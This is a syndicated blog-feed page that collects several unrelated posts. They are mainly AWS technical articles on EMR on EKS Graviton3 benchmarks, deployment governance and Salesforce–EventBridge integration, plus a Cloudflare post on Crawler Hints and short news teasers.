Amazon EMR on EKS gets up to 19% performance boost running on AWS Graviton3 Processors vs. Graviton2

Post Syndicated from Melody Yang original https://aws.amazon.com/blogs/big-data/amazon-emr-on-eks-gets-up-to-19-performance-boost-running-on-aws-graviton3-processors-vs-graviton2/

Amazon EMR on EKS is a deployment option that enables you to easily run Spark workloads on Amazon Elastic Kubernetes Service (Amazon EKS). It allows you to innovate faster with the latest Apache Spark on Kubernetes architecture while benefiting from the performance-optimized Spark runtime powered by Amazon EMR. This deployment option uses Amazon EKS as the underlying compute to orchestrate containerized Spark applications with better price performance.

AWS continually innovates to provide choice and better price performance for our customers, and the third-generation Graviton processor is the next step in that journey. Amazon EMR on EKS now supports Amazon Elastic Compute Cloud (Amazon EC2) C7g, the latest AWS Graviton3 instance family. On a single EKS cluster, we measured EMR runtime for Apache Spark performance by comparing the C7g and C6g families across selected instance sizes of 4XL, 8XL, and 12XL. We are excited to report a performance gain of up to 19% over the sixth-generation C6g Graviton2 instances, which leads to a 15% cost reduction.

In this post, we discuss the performance test results that we observed while running the same EMR Spark runtime on different Graviton-based EC2 instance types.

Some use cases, such as benchmark tests, data pipelines that mix CPU types for fine-grained cost efficiency, or migrations of existing applications from Intel to Graviton-based instances, usually require spinning up separate clusters that host different processor types, such as x86_64 and arm64. However, Amazon EMR on EKS has made this easier. In this post, we also provide guidance on running Spark with multiple CPU architectures in a common EKS cluster, so that you can save significant time and effort by not setting up a separate cluster to isolate the workloads.

Infrastructure innovation

AWS Graviton3 is the latest generation of AWS-designed Arm-based processors, and C7g is the first Graviton3-based instance family on AWS. The C family is designed for compute-intensive workloads, including batch processing, distributed analytics, data transformations, log analysis, and more. Additionally, C7g instances are the first in the cloud to feature DDR5 memory, which provides 50% higher memory bandwidth than DDR4 to enable high-speed access to data in memory. All of these innovations are well suited to big data workloads, especially an in-memory processing framework like Apache Spark.

The following table summarizes the technical specifications for the tested instance types:

Instance Name vCPUs Memory (GiB) EBS-Optimized Bandwidth (Gbps) Network Bandwidth (Gbps) On-Demand Hourly Rate
c6g.4xlarge 16 32 4.75 Up to 10 $0.544
c7g.4xlarge 16 32 Up to 10 Up to 15 $0.58
c6g.8xlarge 32 64 9 12 $1.088
c7g.8xlarge 32 64 10 15 $1.16
c6g.12xlarge 48 96 13.5 20 $1.632
c7g.12xlarge 48 96 15 22.5 $1.74

These instances are all built on the AWS Nitro System, a collection of AWS-designed hardware and software innovations. The Nitro System offloads the CPU virtualization, storage, and networking functions to dedicated hardware and software, delivering performance that is nearly indistinguishable from bare metal. Notably, C7g instances include support for Elastic Fabric Adapter (EFA), which becomes standard on this instance family. It allows applications to communicate directly with network interface cards, providing lower and more consistent latency. Additionally, these are all Amazon EBS-optimized instances, and C7g provides higher dedicated bandwidth for EBS volumes, which can result in better I/O performance and quicker read/write operations in Spark.

Performance test results

To quantify performance, we ran TPC-DS benchmark queries for Spark at the 3 TB scale. These queries are derived from TPC-DS standard SQL scripts, and the test results are not comparable to other published TPC-DS benchmark outcomes. Apart from the benchmark standards, a single Amazon EMR 6.6 Spark runtime (compatible with Apache Spark version 3.2.0) was used as the data processing engine across six different managed node groups on an EKS cluster: C6g_4, C7g_4, C6g_8, C7g_8, C6g_12, and C7g_12. These groups are named after the instance type to distinguish the underlying compute resources. Each group can automatically scale between 1 and 30 nodes within its corresponding instance type. By architecting the EKS cluster this way, we can run and compare our experiments in parallel, each hosted in a single node group, that is, an isolated compute environment on a common EKS cluster. It also makes it possible to run an application with multiple CPU architectures on a single cluster. Check out the sample EKS cluster configuration and benchmark job examples for more details.
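As an illustration only (the cluster and node group names here are assumptions; the benchmark itself uses the sample EKS cluster configuration linked above), a node group such as C7g_4 could be created with eksctl along these lines:

eksctl create nodegroup \
  --cluster emr-on-eks-benchmark \
  --name C7g_4 \
  --instance-types c7g.4xlarge \
  --nodes 1 --nodes-min 1 --nodes-max 30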

We measure the Graviton performance and cost improvements using two calculations: total query runtime and the geometric mean of the per-query runtimes. The following table shows the results for equivalently sized C6g and C7g instances running the same Spark configurations.

Benchmark Attributes 12 XL 8 XL 4 XL
Task parallelism (spark.executor.cores*spark.executor.instances) 188 cores (4*47) 188 cores (4*47) 188 cores (4*47)
spark.executor.memory 6 GB 6 GB 6 GB
Number of EC2 instances 5 7 16
EBS volume 4 * 128 GB io1 disk 4 * 128 GB io1 disk 4 * 128 GB io1 disk
Provisioned IOPS per volume 6400 6400 6400
Total query runtime on C6g (sec) 2099 2098 2042
Total query runtime on C7g (sec) 1728 1738 1660
Total run time improvement with C7g 18% 17% 19%
Geometric mean query time on C6g (sec) 9.74 9.88 9.77
Geometric mean query time on C7g (sec) 8.40 8.32 8.08
Geometric mean improvement with C7g 13.8% 15.8% 17.3%
EMR on EKS memory usage cost on C6g (per run) $0.28 $0.28 $0.28
EMR on EKS vCPU usage cost on C6g (per run) $1.26 $1.25 $1.24
Total cost per benchmark run on C6g (EC2 + EKS cluster + EMR price) $6.36 $6.02 $6.52
EMR on EKS memory usage cost on C7g (per run) $0.23 $0.23 $0.22
EMR on EKS vCPU usage cost on C7g (per run) $1.04 $1.03 $0.99
Total cost per benchmark run on C7g (EC2 + EKS cluster + EMR price) $5.49 $5.23 $5.54
Estimated cost reduction with C7g 13.7% 13.2% 15%

The total number of cores and memory are identical across all benchmarked instances, and four provisioned IOPS SSD (io1) volumes were attached to each EBS-optimized instance for optimal disk I/O performance. To allow for comparison, these configurations were intentionally chosen to match the settings in other EMR on EKS benchmarks. Check out the previous benchmark blog post, Amazon EMR on Amazon EKS provides up to 61% lower costs and up to 68% performance improvement for Spark workloads, for C5 instances based on x86_64 Intel CPUs.
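For reference, the executor sizing from the preceding table corresponds to Spark submit parameters along the following lines. This is only a sketch of the shape of the configuration; the authoritative values live in the benchmark job examples linked earlier:

--conf spark.executor.instances=47 \
--conf spark.executor.cores=4 \
--conf spark.executor.memory=6g \
--conf spark.kubernetes.node.selector.eks.amazonaws.com/nodegroup=C7g_4

These flags are passed through the sparkSubmitParameters field of the EMR on EKS job request shown later in this post.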

The table indicates that C7g instances deliver consistent performance improvements over equivalent C6g Graviton2 instances. Our test results showed a 17–19% improvement in total query runtime for the selected instance sizes, and a 13.8–17.3% improvement in geometric mean. On cost, we observed a 13.2–15% cost reduction for the C7g performance tests compared to C6g while running the 104 TPC-DS benchmark queries.

Data shuffle in a Spark workload

Generally, big data frameworks schedule computation tasks on different nodes in parallel to achieve optimal performance. To proceed with its computation, a node must have the results of computations from upstream. This requires moving intermediate data from multiple servers to the nodes where that data is required, which is termed shuffling data. In many Spark workloads, data shuffle is an inevitable operation, so it plays an important role in performance assessments. This operation may involve a high rate of disk I/O and network data transmission, and can consume a significant number of CPU cycles.

If your workload is I/O bound or bottlenecked by current data shuffle performance, one recommendation is to benchmark on improved hardware. Overall, C7g offers better EBS and network bandwidth compared to equivalent C6g instance types, which may help you optimize performance. Therefore, in the same benchmark test, we captured the following extra information, which is broken down into per-instance-type network/IO improvements.

Based on the TPC-DS query test results, this graph illustrates the percentage increases for data shuffle operations in four categories: maximum disk read and write, and maximum network received and transmitted. In comparison to C6g instances, disk read performance improved by 25–45%, whereas disk write performance increased by 34–47%. For network throughput, we observed an increase of 21–36%.

Run an Amazon EMR on EKS job with multiple CPU architectures

If you’re evaluating a migration to Graviton instances for Amazon EMR on EKS workloads, we recommend testing the Spark workloads based on your real-world use cases. If you need to run workloads across multiple processor architectures, for example to compare performance on Intel and Arm CPUs, follow the walkthrough in this section to get started with some concrete ideas.

Build a single multi-arch Docker image

To build a single multi-arch Docker image (x86_64 and arm64), complete the following steps:

  1. Get the Docker Buildx CLI extension. Docker Buildx is a CLI plugin that extends the Docker command to support the multi-architecture feature. Upgrade to the latest Docker Desktop or manually download the CLI binary. For more details, check out Working with Buildx.
  2. Validate the version after the installation:
    docker buildx version

  3. Create a new builder that gives access to the new multi-architecture features (you only have to perform this task once):
    docker buildx create --name mybuilder --use

  4. Log in to your own Amazon ECR registry:
    AWS_REGION=us-east-1
    ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)
    ECR_URL=$ACCOUNT_ID.dkr.ecr.$AWS_REGION.amazonaws.com
    aws ecr get-login-password --region $AWS_REGION | docker login --username AWS --password-stdin $ECR_URL

  5. Log in to the AWS-owned source registry and pull the EMR Spark base image:
    SRC_ECR_URL=755674844232.dkr.ecr.us-east-1.amazonaws.com
    aws ecr get-login-password --region us-east-1 | docker login --username AWS --password-stdin $SRC_ECR_URL
    docker pull $SRC_ECR_URL/spark/emr-6.6.0:latest

  6. Build and push a custom Docker image.

In this case, we build a single Spark benchmark utility docker image on top of Amazon EMR 6.6. It supports both Intel and Arm processor architectures:

  • linux/amd64 – x86_64 (also known as AMD64 or Intel 64)
  • linux/arm64 – Arm
docker buildx build \
--platform linux/amd64,linux/arm64 \
-t $ECR_URL/eks-spark-benchmark:emr6.6 \
-f docker/benchmark-util/Dockerfile \
--build-arg SPARK_BASE_IMAGE=$SRC_ECR_URL/spark/emr-6.6.0:latest \
--push .
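Optionally (this step is not part of the original walkthrough), you can confirm that both architectures made it into the pushed manifest:

docker buildx imagetools inspect $ECR_URL/eks-spark-benchmark:emr6.6

The output lists one manifest entry per platform, in this case linux/amd64 and linux/arm64.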

Submit Amazon EMR on EKS jobs with and without Graviton

For our first example, we submit a benchmark job to the Graviton3 node group that spins up c7g.4xlarge instances.

The following is not a complete script. Check out the full version of the example on GitHub.

aws emr-containers start-job-run \
--virtual-cluster-id $VIRTUAL_CLUSTER_ID \
--name emr66-c7-4xl \
--execution-role-arn $EMR_ROLE_ARN \
--release-label emr-6.6.0-latest \
--job-driver '{
    "sparkSubmitJobDriver": {
    "entryPoint": "local:///usr/lib/spark/examples/jars/eks-spark-benchmark-assembly-1.0.jar",
    "entryPointArguments":[.......],
    "sparkSubmitParameters": "........"}}' \
--configuration-overrides '{
"applicationConfiguration": [{
    "classification": "spark-defaults",
    "properties": {
        "spark.kubernetes.container.image": "'$ECR_URL'/eks-spark-benchmark:emr6.6",
        "spark.kubernetes.node.selector.eks.amazonaws.com/nodegroup": “C7g_4”
}}]}'

In the following example, we run the same job on non-Graviton C5 instances with Intel 64 CPU. The full version of the script is available on GitHub.

aws emr-containers start-job-run \
--virtual-cluster-id $VIRTUAL_CLUSTER_ID \
--name emr66-c5-4xl \
--execution-role-arn $EMR_ROLE_ARN \
--release-label emr-6.6.0-latest \
--job-driver '{
    "sparkSubmitJobDriver": {
    "entryPoint": "local:///usr/lib/spark/examples/jars/eks-spark-benchmark-assembly-1.0.jar",
    "entryPointArguments":[.......],
    "sparkSubmitParameters": "........"}}' \    
--configuration-overrides '{
"applicationConfiguration": [{
    "classification": "spark-defaults",
    "properties": {
        "spark.kubernetes.container.image": "'$ECR_URL'/eks-spark-benchmark:emr6.6",
        "spark.kubernetes.node.selector.eks.amazonaws.com/nodegroup”: “C5_4”
}}]}'

Summary

In May 2022, the Graviton3 instance family became available to Amazon EMR on EKS. After running the performance-optimized EMR Spark runtime on selected Arm-based Graviton3 instances, we observed a performance increase of up to 19% and cost savings of up to 15% compared to C6g Graviton2 instances. Because Amazon EMR on EKS offers 100% API compatibility with open-source Apache Spark, you can quickly step into the evaluation process with no application changes.

If you’re wondering how much performance gain you can achieve with your use case, try out the benchmark solution or the EMR on EKS Workshop. You can also contact your AWS Solutions Architects, who can assist you along your innovation journey.


About the author

Melody Yang is a Senior Big Data Solution Architect for Amazon EMR at AWS. She is an experienced analytics leader working with AWS customers to provide best practice guidance and technical advice in order to assist their success in data transformation. Her areas of interest are open-source frameworks and automation, data engineering, and DataOps.

Bivol Documents: “We will do the unloading.” 200 thugs terrorize Kapitan Andreevo with fake powers of attorney

Post Syndicated from Николай Марченко original https://bivol.bg/%D0%BD%D0%B8%D0%B5-%D1%89%D0%B5-%D1%80%D0%B0%D0%B7%D1%82%D0%BE%D0%B2%D0%B0%D1%80%D0%B2%D0%B0%D0%BC%D0%B5-200-%D0%BC%D1%83%D1%82%D1%80%D0%B8-%D1%82%D0%B5%D1%80%D0%BE%D1%80%D0%B8.html

Friday, 12 August 2022


Around 200 people from four key companies of Kerope Chakaryan (Ami), Krasimir Kamenov (Karo), and the drug boss Hristoforos Nikos Amanatidis (Taki), who is hiding in Dubai, hold passes…

Crawler Hints supports Microsoft’s IndexNow in helping users find new content

Post Syndicated from Alex Krivit original https://blog.cloudflare.com/crawler-hints-supports-microsofts-indexnow-in-helping-users-find-new-content/

The web is constantly changing. Whether it’s news or updates to your social feed, it’s a constant flow of information. As a user, that’s great. But have you ever stopped to think how search engines deal with all the change?

It turns out, they “index” the web on a regular basis, sending bots out to constantly crawl webpages, looking for changes. Today, bot traffic accounts for about 30% of total traffic on the Internet, and given how foundational search is to using the Internet, it should come as no surprise that search engine bots make up a large proportion of that. What might come as a surprise, though, is how inefficient the model is: we estimate that over 50% of crawler traffic is wasted effort.

This has a huge impact. There’s all the additional capacity that owners of websites need to bake into their site to absorb the bots crawling all over it. There’s the transmission of the data. There’s the CPU cost of running the bots. And when you’re running at the scale of the Internet, all of this has a pretty big environmental footprint.

Part of the problem, though, is nobody had really stopped to ask: maybe there’s a better way?

Right now, the model for indexing websites is the same as it has been since the 1990s: a “pull” model, where the search engine sends a crawler out to a website after a predetermined amount of time. During Impact Week last year, we asked: what about flipping the model on its head? What about moving to a push model, where a website could simply ping a search engine to let it know an update had been made?

There are a heap of advantages to such a model. The website wins: it’s not dealing with unnecessary crawls. It also makes sure that as soon as there’s an update to its content, it’s reflected in the search engine — it doesn’t need to wait for the next crawl. The website owner wins because they don’t need to manage distinct search engine crawl submissions. The search engine wins, too: it saves money on crawl costs, and it can make sure it gets the latest content.

Of course, this needs work to be done on both sides of the equation. The websites need a mechanism to alert the search engines; and the search engines need a mechanism to receive the alert, so they know when to do the crawl.

Crawler Hints — Cloudflare’s Solution for Websites

Solving this problem is why we launched Crawler Hints. Cloudflare sits in a unique position on the Internet — we’re serving on average 36 million HTTP requests per second. That represents a lot of websites. It also means we’re uniquely positioned to help solve this problem: to give crawlers hints about when they should recrawl, because new content has been added or content on a site has recently changed.

With Crawler Hints, we send signals to web indexers based on cache data and origin status codes to help them understand when content has likely changed or been added to a site. The aim is to increase the number of relevant crawls as well as drastically reduce the number of crawls that don’t find fresh content, saving bandwidth and compute for both indexers and sites alike, and improving the experience of using the search engines.

But, of course, that’s just half the equation.

IndexNow Protocol — the Search Engine Moves from Pull to Push

Websites alerting the search engine about changes is useless if the search engines aren’t listening — and they simply continue to crawl the way they always have. Of course, search engines are incredibly complicated, and changing the way they operate is no easy task.

The IndexNow Protocol is a standard developed by Microsoft, Seznam.cz and Yandex, and it represents a major shift in the way search engines operate. Using IndexNow, search engines have a mechanism by which they can receive signals from Crawler Hints. Once they have that signal, they can shift their crawlers from a pull model to a push model.
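To make the push side concrete, an IndexNow submission is essentially a single HTTP request. The following is a generic sketch of the public protocol, not the exact call Crawler Hints makes on your behalf; the key and URL are placeholders:

curl "https://api.indexnow.org/indexnow?url=https://example.com/new-page&key=YOUR_INDEXNOW_KEY"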

In a recent update, Microsoft announced that millions of websites are now using IndexNow to signal to search engine crawlers when their content needs to be crawled, and that IndexNow was used to index or crawl about 7% of all new URLs clicked when someone selects from web search results.

On the Cloudflare side, since its release in October 2021, Crawler Hints has processed about 600 billion signals to IndexNow.

That’s a lot of saved crawls.

How to enable Crawler Hints

By enabling Crawler Hints on your website, with the simple click of a button, Cloudflare will take care of signaling to these search engines when your content has changed via the IndexNow API. You don’t need to do anything else!

Crawler Hints is free to use and available to all Cloudflare customers. If you’d like to see how Crawler Hints can benefit how your website is indexed by the world’s biggest search engines, you can opt in to the service as follows:

  1. Sign in to your Cloudflare Account.
  2. In the dashboard, navigate to the Cache tab.
  3. Click on the Configuration section.
  4. Locate Crawler Hints and enable it.

Upon enabling Crawler Hints, Cloudflare will share with search engines, via the IndexNow protocol, when content on your site has changed and needs to be re-crawled (this blog can help if you’re interested in finding out more about how the mechanism works).

What’s Next?

Going forward, because the benefits are so substantial for site owners, search operators, and the environment, we plan to start defaulting Crawler Hints on for all our customers. We’re also hopeful that Google, the world’s largest search engine and most wasteful user of Internet resources, will adopt IndexNow or a similar standard and lower the burden of search crawling on the planet.

When we think of helping to build a better Internet, this is exactly what comes to mind: creating and supporting standards that make it operate better, greener, faster. We’re really excited about the work to date, and will continue to work to improve the signaling to ensure the most valuable information is being sent to the search engines in a timely manner. This includes incorporating additional signals such as etags, last-modified headers, and content hash differences. Adding these signals will help further inform crawlers when they should reindex sites, and how often they need to return to a particular site to check if it’s been changed. This is only the beginning. We will continue testing more signals and working with industry partners so that we can help crawlers run efficiently with these hints.

And finally: if you’re on Cloudflare, and you’d like to be part of this revolution in how search engines operate on the web (it’s free!), simply follow the instructions in the section above.

Accelerate deployments on AWS with effective governance

Post Syndicated from Rostislav Markov original https://aws.amazon.com/blogs/architecture/accelerate-deployments-on-aws-with-effective-governance/

Amazon Web Services (AWS) users ask how to accelerate their teams’ deployments on AWS while maintaining compliance with security controls. In this blog post, we describe common governance models introduced in mature organizations to manage their teams’ AWS deployments. These models are best used to increase the maturity of your cloud infrastructure deployments.

Governance models for AWS deployments

We distinguish three common models used by mature cloud adopters to manage their infrastructure deployments on AWS. The models differ in what they control: the infrastructure code, deployment toolchain, or provisioned AWS resources. We define the models as follows:

  1. Central pattern library, which offers a repository of curated deployment templates that application teams can re-use with their deployments.
  2. Continuous Integration/Continuous Delivery (CI/CD) as a service, which offers a toolchain standard to be re-used by application teams.
  3. Centrally managed infrastructure, which allows application teams to deploy AWS resources managed by central operations teams.

The decision of how much responsibility you shift to application teams depends on their autonomy, operating model, application type, and rate of change. The three models can be used in tandem to address different use cases and maximize impact. Typically, organizations start by gathering pre-approved deployment templates in a central pattern library.

Model 1: Central pattern library

With this model, cloud platform engineers publish a central pattern library from which teams can reference infrastructure as code templates. Application teams reuse the templates by forking the central repository or by copying the templates into their own repository. Application teams can also manage their own deployment AWS account and pipeline (with AWS CodePipeline), as well as the resource-provisioning process, while reusing templates from the central pattern library hosted in a service like AWS CodeCommit. Figure 1 provides an overview of this governance model.

Deployment governance with central pattern library

Figure 1. Deployment governance with central pattern library

The central pattern library represents the least intrusive form of enablement via reusable assets. Application teams appreciate the central pattern library model, as it allows them to maintain autonomy over their deployment process and toolchain. Reusing existing templates speeds up the creation of your teams’ first infrastructure templates and eases policy adherence, such as tagging policies and security controls.

After the reusable templates are in the application team’s repository, incremental updates can be pulled from the central library when the template has been enhanced. This allows teams to pull when they see fit. Changes to the team’s repository will trigger the pipeline to deploy the associated infrastructure code.
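As a minimal sketch, assuming the central pattern library is a Git repository that the application team originally forked (the repository name and URL are placeholders), pulling an enhanced template could look like this:

git remote add upstream https://git.example.com/platform/central-pattern-library.git
git fetch upstream
git merge upstream/main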

With the central pattern library model, application teams need to manage resource configuration and CI/CD toolchain on their own in order to gain the benefits of automated deployments. Model 2 addresses this.

Model 2: CI/CD as a service

In Model 2, application teams launch a governed deployment pipeline from AWS Service Catalog. This includes the infrastructure code needed to run the application and “hello world” source code to show the end-to-end deployment flow.

Cloud platform engineers develop the service catalog portfolio (in this case the CI/CD toolchain). Then, application teams can launch AWS Service Catalog products, which deploy an instance of the pipeline code and a populated Git repository (Figure 2).

The pipeline is initiated immediately after the repository is populated, which results in the “hello world” application being deployed to the first environment. The infrastructure code (for example, Amazon Elastic Compute Cloud [Amazon EC2] and AWS Fargate) will be located in the application team’s repository. Incremental updates can be pulled by launching a product update from AWS Service Catalog. This allows application teams to pull when they see fit.

Deployment governance with CI/CD as a service

Figure 2. Deployment governance with CI/CD as a service

This governance model is particularly suitable for mature developer organizations with full-stack responsibility or platform projects, as it provides end-to-end deployment automation to provision resources across multiple teams and AWS accounts. This model also adds security controls over the deployment process.

Since there is little room for teams to adapt the toolchain standard, the model can be perceived as very opinionated. The model expects application teams to manage their own infrastructure. Model 3 addresses this.

Model 3: Centrally managed infrastructure

This model allows application teams to provision resources managed by a central operations team as self-service. Cloud platform engineers publish infrastructure portfolios to AWS Service Catalog with pre-approved configuration by central teams (Figure 3). These portfolios can be shared with all AWS accounts used by application engineers.

Provisioning AWS resources via AWS Service Catalog products ensures resource configuration fulfills central operations requirements. Compared with Model 2, the pre-populated infrastructure templates launch AWS Service Catalog products, as opposed to directly referencing the API of the corresponding AWS service (for example Amazon EC2). This locks down how infrastructure is configured and provisioned.

Deployment governance with centrally managed infrastructure

Figure 3. Deployment governance with centrally managed infrastructure
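To make the contrast with direct service APIs concrete, an application engineer in this model provisions, for example, a compute product through AWS Service Catalog instead of calling the Amazon EC2 API. The following is a hedged sketch; the product, artifact, and parameter names are placeholders:

aws servicecatalog provision-product \
  --product-name "hardened-ec2-instance" \
  --provisioning-artifact-name "v1.0" \
  --provisioned-product-name "my-app-server" \
  --provisioning-parameters Key=InstanceType,Value=t3.medium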

In our experience, it is essential to manage the variety of AWS Service Catalog products. This avoids a proliferation of products with many templates that differ only slightly. Centrally managed infrastructure propagates an “on-premises” mindset, so it should be used only in cases where application teams cannot own the full stack.

Models 2 and 3 can be combined for application engineers to launch both deployment toolchain and resources as AWS Service Catalog products (Figure 4), while also maintaining the opportunity to provision from pre-populated infrastructure templates in the team repository. After the code is in their repository, incremental updates can be pulled by running an update from the provisioned AWS Service Catalog product. This allows the application team to pull an update as needed while avoiding manual deployments of service catalog products.

Using AWS Service Catalog to automate CI/CD and infrastructure resource provisioning

Figure 4. Using AWS Service Catalog to automate CI/CD and infrastructure resource provisioning

Comparing models

The three governance models differ along the following aspects (see Table 1):

  • Governance level: What component is managed centrally by cloud platform engineers?
  • Role of application engineers: What is the responsibility split and operating model?
  • Use case: When is each model applicable?

Table 1. Governance models for managing infrastructure deployments

 

Model 1: Central pattern library Model 2: CI/CD as a service Model 3: Centrally managed infrastructure
Governance level Centrally defined infrastructure templates Centrally defined deployment toolchain Centrally defined provisioning and management of AWS resources
Role of cloud platform engineers Manage pattern library and policy checks Manage deployment toolchain and stage checks Manage resource provisioning (including CI/CD)
Role of application teams Manage deployment toolchain and resource provisioning Manage resource provisioning Manage application integration
Use case Federated governance with application teams maintaining autonomy over application and infrastructure Platform projects or development organizations with strong preference for pre-defined deployment standards including toolchain Applications without development teams (e.g., “commercial-off-the-shelf”) or with separation of duty (e.g., infrastructure operations teams)

Conclusion

In this blog post, we distinguished three common governance models to manage the deployment of AWS resources. The three models can be used in tandem to address different use cases and maximize impact in your organization. The decision of how much responsibility is shifted to application teams depends on your organizational setup and use case.

Want to learn more?

[$] A fuzzy issue of responsible disclosure

Post Syndicated from original https://lwn.net/Articles/904293/

Fuzz testing is the process of supplying a program with random inputs and
watching to see what breaks; it has been responsible for the identification
of vast numbers of bugs in recent years — and the fixing of many of them.
Developers generally appreciate bug reports, but they can sometimes be a
bit less enthusiastic about a flood of reports from automated fuzzing
systems. A recent discussion around filesystem fuzzing highlighted two
points of view on whether the current fuzz-testing activity is a good
thing.

Introducing bidirectional event integrations with Salesforce and Amazon EventBridge

Post Syndicated from James Beswick original https://aws.amazon.com/blogs/compute/introducing-bidirectional-event-integrations-with-salesforce-and-amazon-eventbridge/

This post is written by Alseny Diallo, Prototype Solutions Architect and Rohan Mehta, Associate Cloud Application Architect.

AWS now supports Salesforce as a partner event source for Amazon EventBridge, allowing you to send Salesforce events to AWS. You can also configure Salesforce with EventBridge API Destinations and send EventBridge events to Salesforce. These integrations enable you to act on changes to your Salesforce data in real-time and build custom applications with EventBridge and over 100 built-in sources and targets.

In this blog post, you learn how to set up a bidirectional integration between Salesforce and EventBridge and explore use cases for working with Salesforce events. You also see an example application for interacting with Salesforce support case events, with automated workflows that detect sentiment using AWS AI/ML services and enrich support cases with customer order data.

Integration overview

Salesforce is a customer relationship management (CRM) platform that gives companies a single, shared view of customers across their marketing, sales, commerce, and service departments. Salesforce Event Relays for AWS enable bidirectional event flows between Salesforce and AWS through EventBridge.

Amazon EventBridge is a serverless event bus that makes it easier to build event-driven applications at scale using events generated from your applications, integrated software as a service (SaaS) applications, and AWS services. EventBridge partner event source integrations enable customers to receive events from over 30 SaaS applications and ingest them into their AWS applications.

Salesforce as a partner event source for EventBridge makes it easier to build event-driven applications that span customers’ data in Salesforce and applications running on AWS. Customers can send events from Salesforce to EventBridge and vice versa without having to write custom code or manage an integration.

EventBridge joins Amazon AppFlow as a way to integrate Salesforce with AWS. The Salesforce Amazon AppFlow integration is well suited for use cases that require ingesting large volumes of data, like a daily scheduled data transfer sending Salesforce records into an Amazon Redshift data warehouse or an Amazon S3 data lake. The Salesforce EventBridge integration is a good fit for real-time processing of changes to individual Salesforce records.

Use cases

Customers can act on new or modified Salesforce records through integrations with a variety of EventBridge targets, including AWS Lambda, AWS Step Functions, and API Gateway. The integration can enable use cases across industries that must act on customer events in real time.

  • Retailers can automatically unify their Salesforce data with AWS data sources. When a new customer support case is created in Salesforce, enrich the support case with recent order data from that customer retrieved from an orders database running on AWS.
  • Media and entertainment providers can augment their omnichannel experiences with AWS AI/ML services to increase customer engagement. When a new customer account is created in Salesforce, use Amazon Personalize and Amazon Simple Email Service to send a welcome email with personalized media recommendations.
  • Insurers can automate form processing workflows. When a new insurance claim form PDF is uploaded to Salesforce, extract the submitted information with Amazon Textract and orchestrate processing the claim information with AWS Step Functions.

Solution overview

The example application shows how the integration can enhance customer support experiences by unifying support tickets with customer order data, detecting customer sentiment, and automating support case workflows.

Reference architecture

  1. A new case is created in Salesforce and an event is sent to an EventBridge partner event bus.
  2. If the event matches the EventBridge rule, the rule sends the event to both the Enrich Case and Case Processor Workflows in parallel.
  3. The Enrich Case Workflow uses the Customer ID in the event payload to query the Orders table for the customer’s recent order. If this step fails, the event is sent to an Amazon SQS dead letter queue.
  4. The Enrich Case Workflow publishes a new event with the customer’s recent order to an EventBridge custom event bus.
  5. The Case Processor Workflow performs sentiment analysis on the support case content and sends a customized text message to the customer. See the diagram below for details on the workflow.
  6. The Case Processor Workflow publishes a new event with the sentiment analysis results to the custom event bus.
  7. EventBridge rules match the events published to the associated rules: CaseProcessorEventRule and EnrichCaseAppEventRule.
  8. These rules send the events to EventBridge API Destinations. API Destinations sends the events to Salesforce HTTP endpoints to create two Salesforce Platform Events.
  9. Salesforce data is updated with the two Platform Events:
    1. The support case record is updated with the customer’s recent order details and the support case sentiment.
    2. If the support case sentiment is negative, a task is created for an agent to follow up with the customer.

The Case Processor workflow uses Step Functions to process the Salesforce events.

Case processor workflow

  1. Detect the sentiment of the customer feedback using Amazon Comprehend. The result is positive, negative, or neutral (see the example call after this list).
  2. Check if the customer phone number is a mobile number and can receive SMS using Amazon Pinpoint’s mobile number validation endpoint.
  3. If the customer did not provide a mobile number, bypass the SMS steps and put an event with the detected sentiment onto the custom event bus.
  4. If the customer provided a mobile number, send them an SMS with the appropriate message based on the sentiment of their case.
    1. If sentiment is positive or neutral, the message is thanking the customer for their feedback.
    2. If the sentiment is negative, the message offers additional support.
  5. The state machine then puts an event with the sentiment analysis results onto the custom event bus.
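For reference, the sentiment detection in step 1 maps to Amazon Comprehend's DetectSentiment API. The following quick check is a sketch, not part of the sample application, and the text is an invented example:

aws comprehend detect-sentiment \
  --language-code en \
  --text "My order arrived damaged and support has not responded."

The response contains a Sentiment field (POSITIVE, NEGATIVE, NEUTRAL, or MIXED) plus confidence scores, which is what the Case Processor state machine branches on.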

Prerequisites

Environment setup

  1. Follow the instructions here to set up your Salesforce Event Relay. Once you have an event bus created with the partner event source, proceed to step 2.
  2. Copy the ARN of the event bus.
  3. Create a Salesforce Connected App. This is used for the API Destinations configuration to send updates back into Salesforce.
  4. You can create a new user within Salesforce with appropriate API permissions to update records. The user name and password are used by the API Destinations configuration.
  5. The example provided by Salesforce uses a Platform Event called “Carbon Comparison”. For this sample app, you create three custom platform events with the following configurations:
    1. Customer Support Case (Salesforce to AWS):
      Customer support case
    2. Processed Support Case (AWS to Salesforce):
      Processed Support case
    3. Enrich Case (AWS to Salesforce):
      Enrich case example
  6. This example application assumes that a custom Sentiment field is added to the Salesforce Case record type. See this link for how to create custom fields in Salesforce.
  7. The example application uses Salesforce Flows to trigger outbound platform events and handle inbound platform events. See this link for how to use Salesforce Flows to build event driven applications on Salesforce.
  8. Clone the AWS SAM template here.
    sam build
    sam deploy --guided

    For the parameter prompts, enter:

  • SalesforceOauthClientId and SalesforceOauthClientSecret: Use the values created with the Connected App in step 3.
  • SalesforceUsername and SalesforcePassword: Use the values created for the new user in step 4.
  • SalesforceOauthUrl: Salesforce URL for OAuth authentication
  • SalesforceCaseProcessorEndpointUrl: Salesforce URL for creating a new Processed Support Case Platform Event object, in this case: https://MyDomainName.my.salesforce.com/services/data/v54.0/sobjects/Processed_Support_Case__e
  • SFEnrichCaseEndpointUrl: Salesforce URL for creating a new Enrich Case Platform Event object, in this case: https://MyDomainName.my.salesforce.com/services/data/v54.0/sobjects/Enrich_Case__e
  • SalesforcePartnerEventBusArn: Use the value from step 2.
  • SalesforcePartnerEventPattern: The detail-type value should be the API name of the custom platform event, in this case: {"detail-type": ["Customer_Support_Case__e"]}

Conclusion

This blog shows how to act on changes to your Salesforce data in real-time using the new Salesforce partner event source integration with EventBridge. The example demonstrated how your Salesforce data can be processed and enriched with custom AWS applications and updates sent back to Salesforce using EventBridge API Destinations.

To learn more about EventBridge partner event sources and API Destinations, see the EventBridge Developer Guide. For more serverless resources, visit Serverless Land.

Twitter Exposes Personal Information for 5.4 Million Accounts

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/08/twitter-exposes-personal-information-for-5-4-million-accounts.html

Twitter accidentally exposed the personal information—including phone numbers and email addresses—for 5.4 million accounts. And someone was trying to sell this information.

